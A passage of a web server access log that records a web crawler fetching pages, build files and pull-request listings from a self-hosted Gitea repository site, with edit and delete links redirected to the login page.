"/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11348] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11173] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11350] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11349] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20311] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11348] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11349] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17546] [Gzip 2.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:17:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 21139] [Gzip 10.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12466] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11366] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11366] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11368] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj?display=source" [Client 74.7.227.38] [Length 11766] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:17:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" +[17/Feb/2026:17:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" +[17/Feb/2026:17:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md?display=source" [Client 74.7.227.38] [Length 20818] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:22:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:22:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:22:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 